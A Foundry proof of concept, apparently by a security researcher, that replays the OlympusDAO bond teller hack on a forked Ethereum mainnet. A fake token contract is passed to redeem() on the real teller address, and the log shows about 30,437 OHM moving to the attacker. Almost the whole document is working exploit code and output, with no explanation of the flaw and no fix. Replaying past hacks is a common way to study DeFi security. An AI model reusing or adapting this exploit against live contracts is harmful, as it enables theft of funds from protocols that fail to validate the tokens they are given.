Proof of Concept for OlympusDAO hack using Foundry

OlympusDAO.sol

// author: https://github.com/jackerleon
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.16;

import "forge-std/Test.sol";

interface IERC20 {  
    function name() external view returns (string memory);
    function symbol() external view returns (string memory);    
    function balanceOf(address owner) external view returns (uint256);
    function decimals() external view returns (uint8);
}

interface IBondFixedExpiryTeller {
    function redeem(address token_, uint256 amount_) external;
}

contract AttackTokenContract {
    IERC20 OHM = IERC20(0x64aa3364F17a4D01c6f1751Fd97C2BD3D7e7f1D5);

    function underlying() external view returns(address) {
        return address(OHM);
    }

    function expiry() external pure returns (uint48 _expiry) {
        return 1;
    }

    function burn(address,uint256) external {}
}

contract OlympusDAO is Test {
    IBondFixedExpiryTeller bondExpTeller = IBondFixedExpiryTeller(0x007FE7c498A2Cf30971ad8f2cbC36bd14Ac51156);
    IERC20 OHM = IERC20(0x64aa3364F17a4D01c6f1751Fd97C2BD3D7e7f1D5);

    function setUp() public {
        vm.createSelectFork("mainnet", 15_794_363);
    }

    function testHack() public {
        address fakeToken = address(new AttackTokenContract());

        emit log_named_decimal_uint("[Before Exploit] OHM Balance", OHM.balanceOf(address(this)), OHM.decimals());
        bondExpTeller.redeem(fakeToken, 30_437_077_948_152);
        emit log_named_decimal_uint("[After Exploit] OHM Balance", OHM.balanceOf(address(this)), OHM.decimals());        
    }
}

Running 1 test for test/OlympusDAO/OlympusDAO.sol:OlympusDAO
[PASS] testHack() (gas: 149266)
Logs:
[Before Exploit] OHM Balance: 0.000000000
[After Exploit] OHM Balance: 30437.077948152

Test result: ok. 1 passed; 0 failed; finished in 698.30ms